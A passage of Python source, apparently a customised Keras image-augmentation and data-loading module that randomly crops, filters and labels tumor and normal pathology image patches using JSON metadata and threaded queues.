rotation_matrix = np.array([[np.cos(theta), -np.sin(theta), 0],
[np.sin(theta), np.cos(theta), 0],
[0, 0, 1]])
if height_shift_range:
tx = rng.uniform(-height_shift_range, height_shift_range) * x.shape[img_row_axis]
else:
tx = 0
if width_shift_range:
ty = rng.uniform(-width_shift_range, width_shift_range) * x.shape[img_col_axis]
else:
ty = 0
translation_matrix = np.array([[1, 0, tx],
[0, 1, ty],
[0, 0, 1]])
if shear_range:
shear = rng.uniform(-shear_range, shear_range)
else:
shear = 0
shear_matrix = np.array([[1, -np.sin(shear), 0],
[0, np.cos(shear), 0],
[0, 0, 1]])
if zoom_range[0] == 1 and zoom_range[1] == 1:
zx, zy = 1, 1
else:
zx, zy = rng.uniform(zoom_range[0], zoom_range[1], 2)
zoom_matrix = np.array([[zx, 0, 0],
[0, zy, 0],
[0, 0, 1]])
transform_matrix = np.dot(np.dot(np.dot(rotation_matrix,
translation_matrix),
shear_matrix),
zoom_matrix)
h, w = x.shape[img_row_axis], x.shape[img_col_axis]
transform_matrix = transform_matrix_offset_center(transform_matrix, h, w)
x = apply_transform(x, transform_matrix, img_channel_axis,
fill_mode=fill_mode, cval=cval)
if channel_shift_range != 0:
x = random_channel_shift(x,
channel_shift_range,
img_channel_axis)
get_random = None
if supplied_rngs:
get_random = rng.rand
else:
get_random = np.random.random
if horizontal_flip:
if get_random() < 0.5:
x = flip_axis(x, img_col_axis)
if vertical_flip:
if get_random() < 0.5:
x = flip_axis(x, img_row_axis)
return x
def array_to_img(x, dim_ordering='default', scale=True):
"""Converts a 3D Numpy array to a PIL Image instance.
# Arguments
x: Input Numpy array.
dim_ordering: Image data format.
scale: Whether to rescale image values
to be within [0, 255].
# Returns
A PIL Image instance.
# Raises
ImportError: if PIL is not available.
ValueError: if invalid `x` or `dim_ordering` is passed.
"""
if pil_image is None:
raise ImportError('Could not import PIL.Image. '
'The use of `array_to_img` requires PIL.')
x = np.asarray(x)
if x.ndim != 3:
raise ValueError('Expected image array to have rank 3 (single image). '
'Got array with shape:', x.shape)
if dim_ordering == 'default':
dim_ordering = K.image_dim_ordering()
if dim_ordering not in {'th', 'tf'}:
raise ValueError('Invalid dim_ordering:', dim_ordering)
# Original Numpy array x has format (height, width, channel)
# or (channel, height, width)
# but target PIL image has format (width, height, channel)
if dim_ordering == 'th':
x = x.transpose(1, 2, 0)
if scale:
x = x + max(-np.min(x), 0)
x_max = np.max(x)
if x_max != 0:
x /= x_max
x *= 255
if x.shape[2] == 3:
# RGB
return pil_image.fromarray(x.astype('uint8'), 'RGB')
elif x.shape[2] == 1:
# grayscale
return pil_image.fromarray(x[:, :, 0].astype('uint8'), 'L')
else:
raise ValueError('Unsupported channel number: ', x.shape[2])
def img_to_array(img, dim_ordering='default'):
"""Converts a PIL Image instance to a Numpy array.
# Arguments
img: PIL Image instance.
dim_ordering: Image data format.
# Returns
A 3D Numpy array (float32).
# Raises
ValueError: if invalid `img` or `dim_ordering` is passed.
"""
if dim_ordering == 'default':
dim_ordering = K.image_dim_ordering()
if dim_ordering not in {'th', 'tf'}:
raise ValueError('Unknown dim_ordering: ', dim_ordering)
# Numpy array x has format (height, width, channel)
# or (channel, height, width)
# but original PIL image has format (width, height, channel)
x = np.asarray(img, dtype='float32')
if len(x.shape) == 3:
if dim_ordering == 'th':
x = x.transpose(2, 0, 1)
elif len(x.shape) == 2:
if dim_ordering == 'th':
x = x.reshape((1, x.shape[0], x.shape[1]))
else:
x = x.reshape((x.shape[0], x.shape[1], 1))
else:
raise ValueError('Unsupported image shape: ', x.shape)
return x
def load_img(path, grayscale=False, target_size=None):
"""Loads an image into PIL format.
# Arguments
path: Path to image file
grayscale: Boolean, whether to load the image as grayscale.
target_size: Either `None` (default to original size)
or tuple of ints `(img_height, img_width)`.
# Returns
A PIL Image instance.
# Raises
ImportError: if PIL is not available.
"""
if pil_image is None:
raise ImportError('Could not import PIL.Image. '
'The use of `array_to_img` requires PIL.')
img = pil_image.open(path)
if grayscale:
img = img.convert('L')
else: # Ensure 3 channel even when loaded image is grayscale
img = img.convert('RGB')
if target_size:
img = img.resize((target_size[1], target_size[0]))
return img
def list_pictures(directory, ext='jpg|jpeg|bmp|png'):
return [os.path.join(root, f)
for root, _, files in os.walk(directory) for f in files
if re.match('([\w]+\.(?:' + ext + '))', f)]
class RandomCrop(object):
def __init__(self,
json_path,
is_training=False,
crop_patch_nb=0,
max_retry_cnt=5,
non_zero_rate=0.7,
foreground_rate=1,
crop_width=511,
crop_height=511,
crop_channel=3,
is_shuffle=True,
readers=1,
num_threads=2,
info_maxsize=3000,
data_maxsize=1000):
self.json_path = json_path
self.is_training = is_training
self.crop_patch_nb = crop_patch_nb
self.max_retry_cnt = max_retry_cnt
self.non_zero_rate = non_zero_rate
self.foreground_rate = foreground_rate
self.crop_width = crop_width
self.crop_height = crop_height
self.crop_channel = crop_channel
self.label = None
self.is_shuffle = is_shuffle
self.readers = readers
self.num_threads = num_threads
self.info_maxsize = info_maxsize
self.data_maxsize = data_maxsize
self.threads = []
self.is_running = False
self.info_head_lock = threading.Lock()
self.info_tail_lock = threading.Lock()
self.data_lock = threading.Lock()
self.json_path_list = self.get_json_path_list()
# create and start thread, create queue
self._queue()
self.start_queue_runners()
# processing of basic patches info
def get_json_path_list(self):
json_path_list = glob.glob(os.path.join(self.json_path, '*.json'))
return json_path_list
def get_all_patch_mask_path_list(self):
all_patches_dic_info = []
for json_index in range(len(self.json_path_list)):
# load json and cal numbers of patch in each json
json_path = self.json_path_list[json_index]
fopen = open(json_path)
json_info = json.load(fopen)
# json_info is a dict
# keys:'image_id', 'data_origin', 'level', 'label' and 'patches'
# patches is a list containing several dictionaries
# keys: 'patch_id', 'img_path', 'mask_path' and 'patch_size'
self.label = json_info['label']
nb_patches_in_each_json = len(json_info['patches'])
for patch_index in range(nb_patches_in_each_json):
patch_dic_info = json_info['patches'][patch_index]
all_patches_dic_info.append(patch_dic_info)
return all_patches_dic_info
def shuffle(self, is_shuffle):
all_patches_dic_info = self.get_all_patch_mask_path_list()
all_patches_dic_info = shuffle_list(all_patches_dic_info, is_shuffle)
return all_patches_dic_info
def get_nb_samples_per_epoch(self):
return len(self.get_all_patch_mask_path_list())
def get_crop_patch_np(self):
return self.crop_patch_nb
# random crop function of training set
def random_crop_once(self, json_info_patch):
# 1 get basic info of patch and load mask
patch_width = json_info_patch['patch_size'][0]
patch_height = json_info_patch['patch_size'][1]
if (patch_width >= self.crop_width) and (patch_height >= self.crop_height):
logger.info('====image_path====: {}' .format(json_info_patch['img_path']))
logger.info('=====mask_path====: {}' .format(json_info_patch['mask_path']))
if json_info_patch['mask_path'] != 'None':
mask_pil = Image.open(json_info_patch['mask_path'])
# print(json_info_patch['mask_path'])
image_pil = Image.open(json_info_patch['img_path'])
# print(json_info_patch['img_path'])
for iter in range(self.max_retry_cnt):
# 2 Get random coordinate
loc_x = patch_width - self.crop_width
loc_y = patch_height - self.crop_height
get_x = random.randint(0, loc_x)
get_y = random.randint(0, loc_y)
# 3 crop mask, cal non_zeros_rate
if json_info_patch['mask_path'] == 'None':
# middle patch without annotation, regard non_zero_count in mask as 1
non_zero_rate = 1
else:
# middle patch with annotation, random crop mask
mask_pil_roi = \
mask_pil.crop((get_x, get_y, get_x + self.crop_width, get_y + self.crop_height))
mask_pil_roi_np = np.array(mask_pil_roi)
non_zero_count = np.count_nonzero(mask_pil_roi_np)
non_zero_rate = non_zero_count / (self.crop_width * self.crop_height)
logger.info('=====non_zero_rate====: {}' .format(non_zero_rate))
# 4 decide actions according to non_zeros_rate
if non_zero_rate >= self.non_zero_rate:
# 4.1 crop image
image_pil_roi = \
image_pil.crop((get_x, get_y, get_x + self.crop_width, get_y + self.crop_height))
image_pil_roi_np = np.array(image_pil_roi)
if self.foreground_rate != 1:
# 4.1.1 need to background filter
# image_thresh = extract_foreground_mask(image_pil_roi_np)
# pdb.set_trace()
fgmask_pil = Image.open(json_info_patch['fgmask_path']).crop((get_x, get_y, get_x + self.crop_width, get_y + self.crop_height))
fg_count = np.count_nonzero(np.array(fgmask_pil))
fg_rate = fg_count / (self.crop_width * self.crop_height)
logger.info('train {} image, after extract_foreground, foreground_rate is: {}' .format(self.label, fg_rate))
if fg_rate < self.foreground_rate:
# 4.1.1.1 crop again
continue
else:
# 4.1.2 do not need to background filter, regard foreground_rate as 1
fg_rate = 1
break
else:
# 4.2 crop again
fg_rate = 0
continue
if (iter == (self.max_retry_cnt - 1)) and (fg_rate < self.foreground_rate):
image_pil_roi_np = None
else:
image_pil_roi_np = None
fg_rate = 0
logger.info("Error! Patch size smaller that target!")
return image_pil_roi_np, fg_rate
# function of eval set
def eval_image(self, json_info_patch):
# 1 get basic info of patch and load mask
# pdb.set_trace()
patch_width = json_info_patch['patch_size'][0]
patch_height = json_info_patch['patch_size'][1]
if (patch_width == self.crop_width) and (patch_height == self.crop_height):
# 2 open image and transform to array
logger.info('====eval img_path===: {}' .format(json_info_patch['img_path']))
image_pil_roi = Image.open(json_info_patch['img_path'])
image_pil_roi_np = np.array(image_pil_roi)
# print(json_info_patch['img_path'])
if self.foreground_rate != 1:
# 3.1 need to filter background
if json_info_patch['mask_path'] != 'None':
# 3.1.1 middle patch(with mask) need to filter background
# image_thresh = extract_foreground_mask(image_pil_roi_np)
fgmask_pil = Image.open(json_info_patch['fgmask_path']).crop((get_x, get_y, get_x + self.crop_width, get_y + self.crop_height))
fg_count = np.count_nonzero(np.array(fgmask_pil))
fg_rate = fg_count / (self.crop_width * self.crop_height)
logger.info('eval {} image, foreground_rate: {}' .format(self.label, fg_rate))
else:
# 3.1.2 middle patch(without mask) do not need to filter background
fg_rate = 1
else:
# 3.2 do not need to filter background, regard foreground_rate as 1
fg_rate = 1
else:
fg_rate = 0
image_pil_roi_np = None
logger.info('the size of eval image is wrong!')
return image_pil_roi_np, fg_rate
# queue
def _queue(self):
self.info_queue = Queue(maxsize=self.info_maxsize)
self.data_queue = Queue(maxsize=self.data_maxsize)
def get_queue(self):
return self.data_queue
def close_queue(self):
# https://github.com/mwfrojdman/cpython/blob/closeable_queue/Lib/queue.py
# https://stackoverflow.com/questions/6517953/clear-all-items-from-the-queue
self.info_queue.mutex.acquire()
self.info_queue.queue.clear()
self.info_queue.not_empty.notify_all()
self.info_queue.not_full.notify_all()
self.info_queue.all_tasks_done.notify_all()
self.info_queue.unfinished_tasks = 0
self.info_queue.mutex.release()
self.data_queue.mutex.acquire()
self.data_queue.queue.clear()
self.data_queue.not_empty.notify_all()
self.data_queue.not_full.notify_all()
self.data_queue.all_tasks_done.notify_all()
self.data_queue.unfinished_tasks = 0
self.data_queue.mutex.release()
# thread
def info_input_producer(self, info_list):
while self.get_work_threads_status():
for info in info_list:
if not self.get_work_threads_status():
break
self.info_tail_lock.acquire()
self.info_queue.put(info)
self.info_tail_lock.release()
logger.info('*************info thread is end!**************')
def data_input_producer(self):
while self.get_work_threads_status():
while (not self.info_queue.empty()) and self.get_work_threads_status():
self.info_head_lock.acquire()
patch_dic_info = self.info_queue.get()
self.info_head_lock.release()
# pdb.set_trace()
if self.is_training:
image, rate = self.random_crop_once(patch_dic_info)
else:
image, rate = self.eval_image(patch_dic_info)
if rate >= self.foreground_rate:
self.data_lock.acquire()
self.data_queue.put([image.astype(np.float32), self.label])
self.data_lock.release()
logger.info('*************data thread is end!***************')
def start_queue_runners(self):
for _ in range(self.readers):
t = threading.Thread(target=self.info_input_producer, args=(self.shuffle(self.is_shuffle), ))
self.threads.append(t)
for _ in range (self.num_threads):
t = threading.Thread(target=self.data_input_producer, args=())
self.threads.append(t)
self.set_work_threads_status_start()
for i in range(len(self.threads)):
self.threads[i].setDaemon(True)
self.threads[i].start()
def get_threads(self):
return self.threads
def set_work_threads_status_start(self):
self.is_running = True
def set_work_threads_status_stop(self):
self.is_running = False
def get_work_threads_status(self):
return self.is_running
def end_work_threads_and_queues(self):
self.close_queue()
for index, thread in enumerate(self.get_threads()):
thread.join()
self.close_queue()
class ImageDataGenerator(object):
"""Generate minibatches of image data with real-time data augmentation.
# Arguments
featurewise_center: set input mean to 0 over the dataset.
samplewise_center: set each sample mean to 0.
featurewise_std_normalization: divide inputs by std of the dataset.
samplewise_std_normalization: divide each input by its std.
zca_whitening: apply ZCA whitening.
rotation_range: degrees (0 to 180).
width_shift_range: fraction of total width.
height_shift_range: fraction of total height.
shear_range: shear intensity (shear angle in radians).
zoom_range: amount of zoom. if scalar z, zoom will be randomly picked
in the range [1-z, 1+z]. A sequence of two can be passed instead
to select this range.
channel_shift_range: shift range for each channels.
fill_mode: points outside the boundaries are filled according to the
given mode ('constant', 'nearest', 'reflect' or 'wrap'). Default
is 'nearest'.
cval: value used for points outside the boundaries when fill_mode is
'constant'. Default is 0.
horizontal_flip: whether to randomly flip images horizontally.
vertical_flip: whether to randomly flip images vertically.
rescale: rescaling factor. If None or 0, no rescaling is applied,
otherwise we multiply the data by the value provided
(before applying any other transformation).
preprocessing_function: function that will be implied on each input.
The function will run before any other modification on it.
The function should take one argument:
one image (Numpy tensor with rank 3),
and should output a Numpy tensor with the same shape.
dim_ordering: 'th' or 'tf'. In 'th' mode, the channels dimension
(the depth) is at index 1, in 'tf' mode it is at index 3.
It defaults to the `image_dim_ordering` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "tf".
pool: an open multiprocessing.Pool that will be used to
process multiple images in parallel. If left off or set to
None, then the default serial processing with a single
process will be used.
"""
def __init__(self,
featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
rotation_range=0.,
width_shift_range=0.,
height_shift_range=0.,
shear_range=0.,
zoom_range=0.,
channel_shift_range=0.,
fill_mode='nearest',
cval=0.,
horizontal_flip=False,
vertical_flip=False,
rescale=None,
preprocessing_function=None,
dim_ordering='default',
pool=None,
nb_gpu=4):
if dim_ordering == 'default':
dim_ordering = K.image_dim_ordering()
self.featurewise_center = featurewise_center
self.samplewise_center = samplewise_center
self.featurewise_std_normalization = featurewise_std_normalization
self.samplewise_std_normalization = samplewise_std_normalization
self.zca_whitening = zca_whitening
self.rotation_range = rotation_range
self.width_shift_range = width_shift_range
self.height_shift_range = height_shift_range
self.shear_range = shear_range
self.zoom_range = zoom_range
self.channel_shift_range = channel_shift_range
self.fill_mode = fill_mode
self.cval = cval
self.horizontal_flip = horizontal_flip
self.vertical_flip = vertical_flip
self.rescale = rescale
self.preprocessing_function = preprocessing_function
self.pool = pool
self.nb_gpu=nb_gpu
if dim_ordering not in {'tf', 'th'}:
raise ValueError('dim_ordering should be "tf" (channel after row and '
'column) or "th" (channel before row and column). '
'Received arg: ', dim_ordering)
self.dim_ordering = dim_ordering
if dim_ordering == 'th':
self.channel_axis = 1
self.row_axis = 2
self.col_axis = 3
if dim_ordering == 'tf':
self.channel_axis = 3
self.row_axis = 1
self.col_axis = 2
self.mean = None
self.std = None
self.principal_components = None
if np.isscalar(zoom_range):
self.zoom_range = [1 - zoom_range, 1 + zoom_range]
elif len(zoom_range) == 2:
self.zoom_range = [zoom_range[0], zoom_range[1]]
else:
raise ValueError('zoom_range should be a float or '
'a tuple or list of two floats. '
'Received arg: ', zoom_range)
def flow(self, X, y=None, batch_size=32, shuffle=True, seed=None,
save_to_dir=None, save_prefix='', save_format='jpeg'):
return NumpyArrayIterator(
X, y, self,
batch_size=batch_size,
shuffle=shuffle,
seed=seed,
dim_ordering=self.dim_ordering,
save_to_dir=save_to_dir,
save_prefix=save_prefix,
save_format=save_format,
pool=self.pool)
def flow_from_directory(self, directory,
target_size=(256, 256), color_mode='rgb',
classes=None, class_mode='categorical',
batch_size=32, shuffle=True, seed=None,
save_to_dir=None,
save_prefix='',
save_format='jpeg',
nb_gpu=4,
follow_links=False,
phase=None,
save_list_dir=None):
return DirectoryIterator(
directory, self,
target_size=target_size, color_mode=color_mode,
classes=classes, class_mode=class_mode,
dim_ordering=self.dim_ordering,
batch_size=batch_size, shuffle=shuffle, seed=seed,
save_to_dir=save_to_dir,
save_prefix=save_prefix,
save_format=save_format,
follow_links=follow_links,
pool=self.pool,
nb_gpu=nb_gpu,
phase=phase,
save_list_dir=save_list_dir)
def flow_from_json(self, json_file_path,
target_size=(256, 256), color_mode='rgb',
classes=None, class_mode='categorical',
batch_size=32, shuffle=True, seed=None,
save_to_dir=None,
save_prefix='',
save_format='jpeg',
follow_links=False,
nb_gpu=4,
is_training=True):
return JsonIterator(
json_file_path, self,
target_size=target_size, color_mode=color_mode,
classes=classes, class_mode=class_mode,
dim_ordering=self.dim_ordering,
batch_size=batch_size, shuffle=shuffle, seed=seed,
save_to_dir=save_to_dir,
save_prefix=save_prefix,
save_format=save_format,
follow_links=follow_links,
pool=self.pool,
nb_gpu=nb_gpu,
is_training=is_training)
def pipeline(self):
"""A pipeline of functions to apply in order to an image.
"""
return [
(random_transform, dict(
row_axis=self.row_axis,
col_axis=self.col_axis,
channel_axis=self.channel_axis,
rotation_range=self.rotation_range,
height_shift_range=self.height_shift_range,
width_shift_range=self.width_shift_range,
shear_range=self.shear_range,
zoom_range=self.zoom_range,
fill_mode=self.fill_mode,
cval=self.cval,
channel_shift_range=self.channel_shift_range,
horizontal_flip=self.horizontal_flip,
vertical_flip=self.vertical_flip)
),
(standardize, dict(
preprocessing_function=self.preprocessing_function,
rescale=self.rescale,
channel_axis=self.channel_axis,
samplewise_center=self.samplewise_center,
samplewise_std_normalization=self.samplewise_std_normalization,
featurewise_center=self.featurewise_center,
mean=self.mean,
featurewise_std_normalization=self.featurewise_std_normalization,
std=self.std,
zca_whitening=self.zca_whitening,
principal_components=self.principal_components)
)
]
def standardize(self, x):
return standardize(x,
preprocessing_function=self.preprocessing_function,
rescale=self.rescale,
channel_axis=self.channel_axis,
samplewise_center=self.samplewise_center,
samplewise_std_normalization=self.samplewise_std_normalization,
featurewise_center=self.featurewise_center,
mean=self.mean,
featurewise_std_normalization=self.featurewise_std_normalization,
std=self.std,
zca_whitening=self.zca_whitening,
principal_components=self.principal_components)
def random_transform(self, x):
return random_transform(x,
row_axis=self.row_axis,
col_axis=self.col_axis,
channel_axis=self.channel_axis,
rotation_range=self.rotation_range,
height_shift_range=self.height_shift_range,
width_shift_range=self.width_shift_range,
shear_range=self.shear_range,
zoom_range=self.zoom_range,
fill_mode=self.fill_mode,
cval=self.cval,
channel_shift_range=self.channel_shift_range,
horizontal_flip=self.horizontal_flip,
vertical_flip=self.vertical_flip)
def fit(self, x,
augment=False,
rounds=1,
seed=None):
"""Required for featurewise_center, featurewise_std_normalization
and zca_whitening.
# Arguments
x: Numpy array, the data to fit on. Should have rank 4.
In case of grayscale data,
the channels axis should have value 1, and in case
of RGB data, it should have value 3.
augment: Whether to fit on randomly augmented samples
rounds: If `augment`,
how many augmentation passes to do over the data
seed: random seed.
# Raises
ValueError: in case of invalid input `x`.
"""
x = np.asarray(x)
if x.ndim != 4:
raise ValueError('Input to `.fit()` should have rank 4. '
'Got array with shape: ' + str(x.shape))
if x.shape[self.channel_axis] not in {1, 3, 4}:
raise ValueError(
'Expected input to be images (as Numpy array) '
'following the dimension ordering convention "' + self.dim_ordering + '" '
'(channels on axis ' + str(self.channel_axis) + '), i.e. expected '
'either 1, 3 or 4 channels on axis ' + str(self.channel_axis) + '. '
'However, it was passed an array with shape ' + str(x.shape) +
' (' + str(x.shape[self.channel_axis]) + ' channels).')
if seed is not None:
np.random.seed(seed)
x = np.copy(x)
if augment:
ax = np.zeros(tuple([rounds * x.shape[0]] + list(x.shape)[1:]))
for r in range(rounds):
for i in range(x.shape[0]):
ax[i + r * x.shape[0]] = self.random_transform(x[i])
x = ax
if self.featurewise_center:
self.mean = np.mean(x, axis=(0, self.row_axis, self.col_axis))
broadcast_shape = [1, 1, 1]
broadcast_shape[self.channel_axis - 1] = x.shape[self.channel_axis]
self.mean = np.reshape(self.mean, broadcast_shape)
x -= self.mean
if self.featurewise_std_normalization:
self.std = np.std(x, axis=(0, self.row_axis, self.col_axis))
broadcast_shape = [1, 1, 1]
broadcast_shape[self.channel_axis - 1] = x.shape[self.channel_axis]
self.std = np.reshape(self.std, broadcast_shape)
x /= (self.std + K.epsilon())
if self.zca_whitening:
flat_x = np.reshape(x, (x.shape[0], x.shape[1] * x.shape[2] * x.shape[3]))
sigma = np.dot(flat_x.T, flat_x) / flat_x.shape[0]
u, s, _ = linalg.svd(sigma)
self.principal_components = np.dot(np.dot(u, np.diag(1. / np.sqrt(s + 10e-7))), u.T)
class Iterator(object):
def __init__(self, batch_size, shuffle, seed):
# self.n_total = n_total
# self.n_neg = n_negative
self.batch_size = batch_size
self.shuffle = shuffle
self.batch_index = 0
self.total_batches_seen = 0
self.lock = threading.Lock()
# self.index_generator_n_total = self._flow_index(n_total, batch_size, shuffle, seed)
# self.index_generator_negative = self._flow_index(n_negative, batch_size, shuffle, seed)
# create multiple random number generators to be used separately in
# each process when using a multiprocessing.Pool
if seed:
self.rngs = [np.random.RandomState(seed + i) for i in range(batch_size)]
else:
self.rngs = [np.random.RandomState(i) for i in range(batch_size)]
def end_subthreads(objects):
"""
Args:
objects: object of RandomCrop class
Returns:
None
"""
for obj in objects:
obj.set_work_threads_status_stop()
obj.end_work_threads_and_queues()
def image_data_generator(objects, batch_size):
"""
Args:
objects:
Returns:
batch_images_and_labels: [[iamge, label], [image, label], ...]
"""
# creat RandomCrop obj for each label and generate samples [[iamge, label], [image, label], ...]
while True:
start_time = time.time()
batch_images_and_labels = []
for obj in objects:
queue = obj.get_queue()
while not queue.empty():
for _ in range(obj.get_crop_patch_np()):
batch_images_and_labels.append(queue.get())
break
if len(batch_images_and_labels) == batch_size:
end_time = time.time()
logger.info('=============================================')
logger.info('batch time: {}' .format(end_time - start_time))
logger.info('=============================================')
yield batch_images_and_labels
def get_instance_objects(train_base_path,
eval_base_path,
labels,
nb_per_class,
max_retry_cnt=5,
non_zero_rate=0.7,
crop_width=511,
crop_height=511,
crop_channel=3,
is_training=False,
is_shuffle=True,
readers=1,
num_threads=2,
info_maxsize=750,
data_maxsize=250,
foreground_rate_per_class=[]):
"""
Args:
train_base_path: Base path of training set, for detail info, see README.md.
train_base_path: Base path of eval set, for detail info, see README.md.
labels: List of all classes need to be generator.
nb_per_class: List of numbers of samples for each class.
max_retry_cnt: The max retry counts of random crop, default 5.
non_zero_rate: The rate of non zero in mask after random crop, default 0.7,
set non_zero_rate=1 for middle patch without mask.
crop_width: The width of random crop image.
crop_height: The height of random crop image.
crop_channel: The channels of random crop image.
is_training: Default 'False', if set to 'True', generator data for training, or for eval.
is_shuffle: Default 'True', If set to 'True', it will be shuffle.
readers: The number of threads which push info into info queue.
num_threads: The number of threads which push data into data queue.
info_maxsize: The capacity of info queue.
data_maxsize: The capacity of data queue.
foreground_rate_per_class: Default [], if len(foreground_rate_per_class) != len(labels), it
will be extend to list of 1 with len(labels), 1 stands for no background filter.
e.g. labels = [tumor, benign, insitu, invasive], foreground_rate_per_class = [0.3, 0.5]
then, foreground_rate_per_class will be extend to [0.3, 0.5, 1, 1].
Returns:
List of generators for each class in labels list.
"""
assert len(labels) == len(nb_per_class), \
logger.info('the length of labels is unequal to the length of nb_per_class!')
if len(foreground_rate_per_class) != len(labels):
len_need_to_extend = len(labels) - len(foreground_rate_per_class)
foreground_rate_per_class.extend([1] * len_need_to_extend)
objs = []
nb_samples_per_epoch = []
# pdb.set_trace()
for label, num, foreground_rate in zip(labels, nb_per_class, foreground_rate_per_class):
if is_training:
json_path = os.path.join(train_base_path, label + '/json')
else:
json_path = os.path.join(eval_base_path, label + '/json')
# print("INFO {}".format(json_path))
obj = RandomCrop(json_path=json_path,
is_training=is_training,
crop_patch_nb=num,
max_retry_cnt=max_retry_cnt,
non_zero_rate=non_zero_rate,
foreground_rate=foreground_rate,
crop_width=crop_width,
crop_height=crop_height,
crop_channel=crop_channel,
is_shuffle=is_shuffle,
readers=readers,
num_threads=num_threads,
info_maxsize=info_maxsize,
data_maxsize=data_maxsize)
objs.append(obj)
nb_samples_per_epoch.append(obj.get_nb_samples_per_epoch())
return objs, nb_samples_per_epoch
def reset(self):
self.batch_index = 0
def _flow_index(self, n, batch_size=32, shuffle=False, seed=None):
# ensure self.batch_index is 0
self.reset()
while 1:
if seed is not None:
np.random.seed(seed + self.total_batches_seen)
if self.batch_index == 0:
index_array = np.arange(n)
if shuffle:
index_array = np.random.permutation(n)
else:
index_array = index_array[: self.n]
current_index = (self.batch_index * batch_size) % n
if n >= current_index + int(batch_size/2):
current_batch_size = int(batch_size/2)
self.batch_index += 1
else:
current_batch_size = n - current_index
self.batch_index = 0
self.total_batches_seen += 1
yield (index_array[current_index: current_index + current_batch_size],
current_index, current_batch_size)
def __iter__(self):
# needed if we want to do something like:
# for x, y in data_gen.flow(...):
return self
def __next__(self, *args, **kwargs):
return self.next(*args, **kwargs)
def process_image_pipeline(tup):
""" Worker function for NumpyArrayIterator multiprocessing.Pool
"""
(pipeline, x, rng) = tup
x = x.astype('float32')
for (func, kwargs) in pipeline:
x = func(x, rng=rng, **kwargs)
return x
def process_image_pipeline_dir(tup):
""" Worker function for DirectoryIterator multiprocessing.Pool
"""
(pipeline, fname, directory, grayscale,
target_size, dim_ordering, rng) = tup
img = load_img(os.path.join(directory, fname),
grayscale=grayscale,
target_size=target_size)
x = img_to_array(img, dim_ordering=dim_ordering)
for (func, kwargs) in pipeline:
x = func(x, rng=rng, **kwargs)
return x
def process_image_pipeline_img(tup):
""" Worker function for DirectoryIterator multiprocessing.Pool
"""
(pipeline,batch_generator, grayscale,
target_size, dim_ordering, rng) = tup
x = batch_generator[0].astype(np.float32)
for (func, kwargs) in pipeline:
x = func(x, rng=rng, **kwargs)
if batch_generator[1] == "normal" or batch_generator[1] == "normal_hard" or batch_generator[1] == "normal_hard2" or batch_generator[1] == 'normal_hard_black' or batch_generator[1] == 'normal_hard_dim' or batch_generator[1] == 'normal_hard3':
y=0
if batch_generator[1] == "tumor" or batch_generator[1] == 'tumor_hard':
y=1
# elif batch_generator[1] == "lymphocyte" :
# y=0
return x , y
########################################
# Functions for filtering
########################################
def extract_foreground_mask(img):
'''
Extract the slide foreground as the binary mask 255 or 0
threshold -> dilate -> threshold
Input:
slide: h*w*3 array, the downsampled slided image
Output:
gray_t: h*w array, the foreground is labeled 1 and the other region is labeled 0
'''
threshold = 0.8
dilate_kernel = 2
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (dilate_kernel, dilate_kernel))
# Convert color space
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
ret, gray_t = cv2.threshold(gray, threshold * 255, 255, cv2.THRESH_BINARY_INV)
gray_t = cv2.dilate(gray_t, kernel)
ret, gray_t = cv2.threshold(gray_t, threshold * 255, 255, cv2.THRESH_BINARY)
return gray_t
def process_bgs(img):
img_binary = extract_foreground_mask(img)
img_thresh = img_binary
return img_thresh
## TODO: cut a patch from give image, location=(x,y), target_size=(w,h)
def process_image_pipeline_json(tup):
(pipeline, patch_meta, grayscale,
target_size, dim_ordering, rng) = tup #每个batch中对应位置的随机性是一样的。
fname = patch_meta["img_path"]
fmaskname = patch_meta["mask_path"]
fstatus = patch_meta["label"]
nb_crop = 7
threshold = 0.5
# return x and y
# A tumor patch or a normal patch?
# If it is a tumor patch:
if fstatus == "tumor":
# Load img and corresponding mask.
if fname.startswith('/disk1'):
fname = '/mnt/data/jin_data/lymph_private/0124_finetune_processed/middle_patch/train/tumor/' + os.path.basename(fname)
if fmaskname.startswith('/disk1'):
fmaskname = '/mnt/data/jin_data/lymph_private/0124_finetune_processed/middle_patch/train/mask/' + os.path.basename(fmaskname)
img_original = load_img(fname,
grayscale=grayscale,
target_size=None)
mask_original = load_img(fmaskname,
grayscale=grayscale,
target_size=None)
# mask_verify = np.array(mask)
# mask_np = mask_verify[:, :, 0]
# Check the size of the image:
width = img_original.size[0]
height = img_original.size[1]
# if the image is larger than target size
if (width > target_size[0]) and (height > target_size[1]):
for i in range(10):
# 1. Get random coordinate
loc_x = width - target_size[0]
loc_y = height - target_size[1]
get_x = random.randint(0, loc_x - 1)
get_y = random.randint(0, loc_y - 1)
# 2. Crop the image
img = img_original.crop((get_x, get_y,
get_x + target_size[0],
get_y + target_size[1]))
x = img_to_array(img, dim_ordering=dim_ordering)
for (func, kwargs) in pipeline:
x = func(x, rng=rng, **kwargs)
# 2.5 Check the ratio of white pixels in the image
img_thresh = process_bgs(img=img_to_array(img, dim_ordering=dim_ordering))
total_pixel_m = float(img_thresh.shape[0] * img_thresh.shape[1])
nb_foreground = float(np.count_nonzero(img_thresh))
foreground_ratio = float(nb_foreground / total_pixel_m)
# 3. Crop the mask
get_mask = mask_original.crop((get_x, get_y,
get_x + target_size[0],
get_y + target_size[1]))
get_mask = img_to_array(get_mask, dim_ordering=dim_ordering)
# 4. Calculate mask label
total_pixel = float(get_mask.shape[0] * get_mask.shape[1])
tumor_pixel = float(np.count_nonzero(get_mask[:, :, 0]))
tumor_rate = float(tumor_pixel / total_pixel)
if (tumor_rate >= threshold) and (foreground_ratio >= threshold):
y = 1
return x, y
elif ((tumor_rate < threshold) or (foreground_ratio < threshold)) and (i < (nb_crop-1)):
continue
elif ((tumor_rate < threshold) or (foreground_ratio < threshold)) and (i == (nb_crop-1)):
y = 0
return x, y
# If the image is already smaller than target, there should be sth wrong
else:
print ("Error! Patch size smaller that target!")
# If it is a normal patch
elif fstatus == "lymphocyte":
# Load img and corresponding mask.
if fname.startswith('/disk1'):
fname = '/mnt/data/jin_data/lymph_private/0124_finetune_processed/middle_patch/train/tumor/' + os.path.basename(fname)
if fmaskname.startswith('/disk1'):
fmaskname = '/mnt/data/jin_data/lymph_private/0124_finetune_processed/middle_patch/train/mask/' + os.path.basename(fmaskname)
